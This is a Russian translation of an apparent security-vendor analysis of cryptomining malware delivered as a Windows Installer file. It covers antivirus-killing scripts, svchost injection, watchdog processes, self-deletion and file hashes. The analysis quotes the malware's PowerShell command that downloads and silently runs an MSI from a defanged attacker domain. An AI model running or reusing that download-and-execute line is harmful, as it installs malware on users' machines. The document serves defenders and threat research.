Вредоносное ПО для майнинга криптовалюты использует различные методы уклонения, включая установщик Windows

Распространение вредоносного ПО для майнинга криптовалюты было вызвано не только его высокой потенциальной прибылью, но и способностью оставаться незамеченным в системе, особенно в сочетании с различными процедурами запутывания. Концепция скрытого, трудно обнаруживаемого вредоносного ПО оказалась непреодолимым предложением для многих субъектов угроз, и они, очевидно, добавляют еще больше методов, как на пример, майнер криптовалюты (известный как Coinminer.Win32.MALXMR.TIAOODAM), который использует многократное запутывание и упаковки как основу.

Поведение при установке

Вредоносное ПО попадает на компьютер жертвы в виде MSI-файла установщика Windows, который примечателен тем, что установщик Windows является законным приложением, используемым для установки программного обеспечения. Использование реального компонента Windows делает его менее подозрительным и потенциально позволяет обойти определенные фильтры безопасности.

После установки образца, который мы проанализировали, обнаружено, что он будет установлен в каталог % AppData% \ Roaming \ Microsoft \ Windows \ Template \ FileZilla Server, который будет создан, если его еще нет на компьютере пользователя. Этот каталог будет содержать различные файлы, которые используются как часть процесса:

  • bat — файл сценария, используемый для завершения списка процессов защиты от вредоносных программ, которые в данный момент выполняются
  • exe — инструмент для разархивирования, используемый для другого файла, удаленного в каталоге, icon.ico
  • ico — zip-файл, защищенный паролем, представляющий собой файл значков

Распаковка icon.ico показывает два дополнения, содержащихся в нем:

  • ocx — модуль загрузчика, отвечающий за расшифровку и установку модуля майнинга криптовалюты
  • bin — Зашифрованный, UPX-упакованный и Delphi-скомпилированный модуль майнинга криптовалюты

Следующая часть процесса установки включает создание копий файла ядра ntdll.dll и компонента USER Windows user32.dll в папке %AppData% \ Roaming \ Microsoft \ Windows \ Template \ FileZilla Server \ {Случайные числа}. Мы предполагаем, что это сделано для предотвращения обнаружения API-интерфейсов вредоносных программ. Затем следуют следующие файлы конфигурации, включая майнеров, которые удаляются в папку % UserTemp% \ [Случайное число].

В процессе установки используется кириллический (а не английский) текст, который может указывать регион, из которого пришло вредоносное ПО.

Внедрение процесса и анализ создания сторожевой таймера

После установки ex.exe выполнит свою процедуру, разархивировав icon.ico перед выполнением следующей команды:

  • rundll32 default.ocx,Entry u

Затем он создаст три новых процесса Service Host (svchost.exe) с целью внедрения своих кодов. Первый и второй процессы SvcHost будут действовать как сторожевой таймер, и скорее всего останутся постоянными. Они отвечают за повторную загрузку файла установщика Windows (.msi) с помощью команды Powershell, когда любой из внедренных процессов svchost завершается:

  • “powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”

Третий процесс SvcHost затем внедряется с модулем Coinminer и выполняется с помощью следующей команды:

  • «% System32% \ svchost.exe –config = {путь конфигурации вредоносного ПО}


Чтобы сделать обнаружение и анализ еще более сложным, вредоносное ПО также имеет механизм самоуничтожения. Сначала он создает и выполняет следующий файл:

  • {Случайные символы} .cmD <- сценарий командной строки для самостоятельного удаления

Затем он удаляет каждый файл в своем каталоге установки и удаляет все следы установки в системе.

Одним из примечательных аспектов этой вредоносной программы является то, что она использует популярный пользовательский сборщик Windows Installer WiX в качестве упаковщика, скорее всего, в качестве дополнительного слоя анти-обнаружения. Это указывает на то, что субъекты угрозы, стоящие за ним, прилагают дополнительные усилия для обеспечения того, чтобы их создание оставалось как можно более скрытным.

Эволюционирующий аспект вредоносного ПО для майнинга криптовалюты, в котором постоянно добавляются методы уклонения, означает, что для защиты пользователей от подобных угроз часто требуются мощные инструменты безопасности.

Detected as Trojan.BAT.TASKILL.AA

90ae20b30866bc6dbffd41869ccb642b3802f03d18df19e6c1dcab260bbeba7d

Detected as Coinminer.Win32.MALXMR.TIAOODAM

8de725e349bb8d373763470ca6bcfd45e0b86839519f216ff436d3b8452d2248
95bdcfb385acd09029e93f2d0024a4c8e9b3c0be8e5091b63d98e9d88b9cc33b
ccd609dc059a7bed7bf33c6d7dbd155fb40cdfd7d0091a9809f7f158ecd181bc
a3f34851af892bc0d257f911dd325ebbb959c26533a3c68f15773a633f6c4d38
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
34d1ba59bc22c0b1c1ce46327efdf3286dec4c54e2482986a0478b27bb3cf48b
8be47acf7e9ce316d0b39b65363fc154a83f6946233eebf494216f01e52c44f5
9a2eaaba3357f4addbc56bc7eaa2288e813fdcd1cb086efb3ad20d912968a251

Перевод материала: https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-uses-various-evasion-techniques-including-windows-installer-as-part-of-its-routine/

Поделиться новостью

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *